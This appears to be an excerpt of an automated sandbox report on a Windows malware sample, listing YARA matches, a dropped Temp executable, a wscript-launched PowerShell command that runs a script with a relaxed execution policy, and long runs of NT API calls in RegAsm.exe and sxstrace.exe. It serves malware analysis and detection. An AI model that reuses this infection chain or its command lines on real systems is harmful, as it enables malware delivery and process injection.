                Source: Yara matchFile source: 0000000C.00000002.2896359779.0000000005580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2893509705.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: Process Memory Space: powershell.exe PID: 3196, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: x.exe.1.dr, -B--VL\lpU0sa--hVq3-t1E--.csLong String: Length: 382988
                Source: 1.2.powershell.exe.2409068bb78.0.raw.unpack, -B--VL\lpU0sa--hVq3-t1E--.csLong String: Length: 382988
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0042C5A3 NtClose,6_2_0042C5A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2B60 NtClose,LdrInitializeThunk,6_2_026F2B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_026F2C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_026F2DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F35C0 NtCreateMutant,LdrInitializeThunk,6_2_026F35C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F4340 NtSetContextThread,6_2_026F4340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F4650 NtSuspendThread,6_2_026F4650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2AF0 NtWriteFile,6_2_026F2AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2AD0 NtReadFile,6_2_026F2AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2AB0 NtWaitForSingleObject,6_2_026F2AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2BE0 NtQueryValueKey,6_2_026F2BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2BF0 NtAllocateVirtualMemory,6_2_026F2BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2BA0 NtEnumerateValueKey,6_2_026F2BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2B80 NtQueryInformationFile,6_2_026F2B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2E30 NtWriteVirtualMemory,6_2_026F2E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2EE0 NtQueueApcThread,6_2_026F2EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2EA0 NtAdjustPrivilegesToken,6_2_026F2EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2E80 NtReadVirtualMemory,6_2_026F2E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2F60 NtCreateProcessEx,6_2_026F2F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2F30 NtCreateSection,6_2_026F2F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2FE0 NtCreateFile,6_2_026F2FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2FA0 NtQuerySection,6_2_026F2FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2FB0 NtResumeThread,6_2_026F2FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2F90 NtProtectVirtualMemory,6_2_026F2F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2C60 NtCreateKey,6_2_026F2C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2C00 NtQueryInformationProcess,6_2_026F2C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2CF0 NtOpenProcess,6_2_026F2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2CC0 NtQueryVirtualMemory,6_2_026F2CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2CA0 NtQueryInformationToken,6_2_026F2CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2D30 NtUnmapViewOfSection,6_2_026F2D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2D00 NtSetInformationFile,6_2_026F2D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2D10 NtMapViewOfSection,6_2_026F2D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2DD0 NtDelayExecution,6_2_026F2DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2DB0 NtEnumerateKey,6_2_026F2DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F3010 NtOpenDirectoryObject,6_2_026F3010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F3090 NtSetValueKey,6_2_026F3090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F39B0 NtGetContextThread,6_2_026F39B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F3D70 NtOpenThread,6_2_026F3D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F3D10 NtOpenProcessToken,6_2_026F3D10
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E35C0 NtCreateMutant,LdrInitializeThunk,8_2_045E35C0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E4650 NtSuspendThread,LdrInitializeThunk,8_2_045E4650
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E4340 NtSetContextThread,LdrInitializeThunk,8_2_045E4340
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_045E2C70
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2C60 NtCreateKey,LdrInitializeThunk,8_2_045E2C60
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_045E2CA0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_045E2D10
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_045E2D30
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2DD0 NtDelayExecution,LdrInitializeThunk,8_2_045E2DD0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_045E2DF0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2EE0 NtQueueApcThread,LdrInitializeThunk,8_2_045E2EE0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_045E2E80
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2F30 NtCreateSection,LdrInitializeThunk,8_2_045E2F30
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2FE0 NtCreateFile,LdrInitializeThunk,8_2_045E2FE0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2FB0 NtResumeThread,LdrInitializeThunk,8_2_045E2FB0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E39B0 NtGetContextThread,LdrInitializeThunk,8_2_045E39B0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2AD0 NtReadFile,LdrInitializeThunk,8_2_045E2AD0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2AF0 NtWriteFile,LdrInitializeThunk,8_2_045E2AF0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2B60 NtClose,LdrInitializeThunk,8_2_045E2B60
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_045E2BF0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_045E2BE0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_045E2BA0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E3010 NtOpenDirectoryObject,8_2_045E3010
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E3090 NtSetValueKey,8_2_045E3090
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2C00 NtQueryInformationProcess,8_2_045E2C00
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2CC0 NtQueryVirtualMemory,8_2_045E2CC0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2CF0 NtOpenProcess,8_2_045E2CF0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E3D70 NtOpenThread,8_2_045E3D70
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E3D10 NtOpenProcessToken,8_2_045E3D10
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2D00 NtSetInformationFile,8_2_045E2D00
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2DB0 NtEnumerateKey,8_2_045E2DB0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2E30 NtWriteVirtualMemory,8_2_045E2E30
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2EA0 NtAdjustPrivilegesToken,8_2_045E2EA0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2F60 NtCreateProcessEx,8_2_045E2F60
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2F90 NtProtectVirtualMemory,8_2_045E2F90
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2FA0 NtQuerySection,8_2_045E2FA0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2AB0 NtWaitForSingleObject,8_2_045E2AB0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E2B80 NtQueryInformationFile,8_2_045E2B80
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_00509160 NtCreateFile,8_2_00509160
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_005092D0 NtReadFile,8_2_005092D0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_005093C0 NtDeleteFile,8_2_005093C0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_00509460 NtClose,8_2_00509460
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_005095C0 NtAllocateVirtualMemory,8_2_005095C0
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A83CB83_2_00A83CB8
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A817C83_2_00A817C8
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A82EC83_2_00A82EC8
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A814C83_2_00A814C8
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A80DC03_2_00A80DC0
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A847283_2_00A84728
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A81D383_2_00A81D38
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A825193_2_00A82519
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A808483_2_00A80848
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A836403_2_00A83640
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A813403_2_00A81340
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A810583_2_00A81058
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A83CA83_2_00A83CA8
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A821803_2_00A82180
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A828F73_2_00A828F7
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A819C43_2_00A819C4
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A840203_2_00A84020
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A822393_2_00A82239
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A813313_2_00A81331
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A836313_2_00A83631
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A840103_2_00A84010
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00A828153_2_00A82815
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004184A36_2_004184A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004010006_2_00401000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040113B6_2_0040113B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004021B06_2_004021B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00402A7C6_2_00402A7C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00402A806_2_00402A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0042EBB36_2_0042EBB3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040FC936_2_0040FC93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004044BA6_2_004044BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004025C06_2_004025C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00402EC06_2_00402EC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040DEA36_2_0040DEA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004166AE6_2_004166AE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004166B36_2_004166B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040FEB36_2_0040FEB3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040DFEF6_2_0040DFEF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040DFF36_2_0040DFF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027602746_2_02760274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027402C06_2_027402C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0277A3526_2_0277A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026CE3F06_2_026CE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027803E66_2_027803E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027520006_2_02752000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027481586_2_02748158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B01006_2_026B0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275A1186_2_0275A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027781CC6_2_027781CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027801AA6_2_027801AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DC6E06_2_026DC6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C07706_2_026C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E47506_2_026E4750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BC7C06_2_026BC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027724466_2_02772446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027644206_2_02764420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0276E4F66_2_0276E4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C05356_2_026C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027805916_2_02780591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BEA806_2_026BEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0277AB406_2_0277AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02776BD76_2_02776BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026CA8406_2_026CA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C28406_2_026C2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EE8F06_2_026EE8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026A68B86_2_026A68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D69626_2_026D6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C29A06_2_026C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0278A9A66_2_0278A9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0E596_2_026C0E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0277EE266_2_0277EE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0277EEDB6_2_0277EEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0277CE936_2_0277CE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D2E906_2_026D2E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02734F406_2_02734F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02762F306_2_02762F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02702F286_2_02702F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E0F306_2_026E0F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B2FC86_2_026B2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273EFA06_2_0273EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0C006_2_026C0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B0CF26_2_026B0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02760CB56_2_02760CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275CD1F6_2_0275CD1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026CAD006_2_026CAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BADE06_2_026BADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D8DBF6_2_026D8DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027612ED6_2_027612ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DD2F06_2_026DD2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DB2C06_2_026DB2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C52A06_2_026C52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026AD34C6_2_026AD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0277132D6_2_0277132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0270739A6_2_0270739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0277F0E06_2_0277F0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027770E96_2_027770E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C70C06_2_026C70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0276F0CC6_2_0276F0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F516C6_2_026F516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0278B16B6_2_0278B16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026AF1726_2_026AF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026CB1B06_2_026CB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027716CC6_2_027716CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0277F7B06_2_0277F7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B14606_2_026B1460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0277F43F6_2_0277F43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027775716_2_02777571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275D5B06_2_0275D5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02733A6C6_2_02733A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02777A466_2_02777A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0277FA496_2_0277FA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0276DAC66_2_0276DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02705AA06_2_02705AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02761AA36_2_02761AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275DAAC6_2_0275DAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0277FB766_2_0277FB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02735BF06_2_02735BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026FDBF96_2_026FDBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DFB806_2_026DFB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272D8006_2_0272D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C38E06_2_026C38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C99506_2_026C9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DB9506_2_026DB950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027559106_2_02755910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C9EB06_2_026C9EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0277FF096_2_0277FF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0277FFB16_2_0277FFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C1F926_2_026C1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02739C326_2_02739C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0277FCF26_2_0277FCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02777D736_2_02777D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C3D406_2_026C3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02771D5A6_2_02771D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DFDC06_2_026DFDC0
